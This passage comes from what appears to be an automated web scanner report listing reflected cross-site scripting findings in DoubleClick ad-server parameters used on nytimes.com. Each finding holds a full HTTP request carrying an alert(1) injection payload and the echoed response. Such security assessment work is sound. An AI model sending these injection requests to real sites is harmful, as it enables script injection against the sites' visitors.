Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6485"-alert(1)-"096b3fe0a0 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6762

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRightf6485"-alert(1)-"096b3fe0a0&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bbcd'-alert(1)-'4023a71aeed was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dc"-alert(1)-"de026531d4a was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1620'-alert(1)-'bf7a9f817b6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b3d"-alert(1)-"15aabbab5ea was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f2f'-alert(1)-'b6fb9d14bcc was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4247"-alert(1)-"8bdcaae1fe2 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl
...[SNIP]...

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3263d'-alert(1)-'2764c1dfd7f was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90a97'-alert(1)-'a16d04ed375 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a6c"-alert(1)-"89c361df78a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscU
...[SNIP]...

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ad8'-alert(1)-'abd4b72ba03 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
